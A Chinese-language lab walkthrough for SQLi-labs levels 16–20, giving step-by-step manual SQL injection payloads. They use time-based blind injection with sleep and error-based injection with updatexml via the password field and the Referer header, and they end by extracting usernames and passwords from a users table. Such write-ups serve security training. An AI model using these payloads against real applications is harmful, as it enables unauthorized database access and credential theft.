sqlilabs less16-20关手工注入

第16关

一.判断闭合方式

闭合方式点“）

admin")and1=1#

二.判断数据库长度

admin") and if(length(database())>7, 0, sleep(5))#

页面无延迟 

admin") and if(length(database())>8, 0, sleep(5))#

 

页面有延迟说明数据库长度为8

三.判断数据库的第一个字符

admin") and if(ascii(substr(database(),1,1))>114, 0, sleep(5))#

页面无延迟

admin") and if(ascii(substr(database(),1,1))>115, 0, sleep(5))#

 

页面有延迟说明数据库第一个字符为‘s’

........

最终得出数据库为security

四.判断数据库的表名

admin") and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>117, 0, sleep(5))#

说明数据库表名第一个字符为‘u’

.......

最终得出第一张表为users

五.判断表中的字段

admin") and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>105, 0, sleep(5))-- -

页面有延迟说明表中的第一个字段为‘e'

.......

以此类推可得出所有

第17关

 一判断闭合点

发现只有用户名采用了过滤函数,  修改的密码并没有过滤;所以利用密码进行报错注入

1’ and 1=1；

二. 查询数据库

1'or updatexml(1,concat('~', database(), '~'),0) #

 

 二.查询数据库下的所有表

1'or updatexml(1,concat('~', (select group_concat(table_name) from information_schema.tables where table_schema=database()), '~'),3) #

三.查询user表中的所有列

1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users'),'~'),1)#

 

四.查询所有数据

1' and updatexml(1,concat('~',(select group_concat(username,password) from users),'~'),1)#

 

第18关

利用urp Suite 抓包，在Referer后面进行注入测试

一.判断闭合点

闭合点为1'and

二.查询数据库

updatexml(1, concat(1, database ()), 1)and'

三.查表名

1'and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)and' 

 

四.查列名

1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) and'

 

五.查看users表中所有信息 

1' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)and'

第19关

与第18关同理

一.判断闭合点

闭合方式为'and'

 

二.查数据库

'and updatexml(1,concat(1,database()),1)and'

 

三.查表名

1'and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)and'

 

四.查列名

1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) and'

 

五.查看users表中所有信息

1' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)and'

 

第20关

一.判断闭合方式

闭合方式为'--+

二.查数据库

'and updatexml(1,concat(1,database()),1)--+

 

三.查表名

'and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

 

四.查列名

' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

五.查看users表中所有信息

' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)--+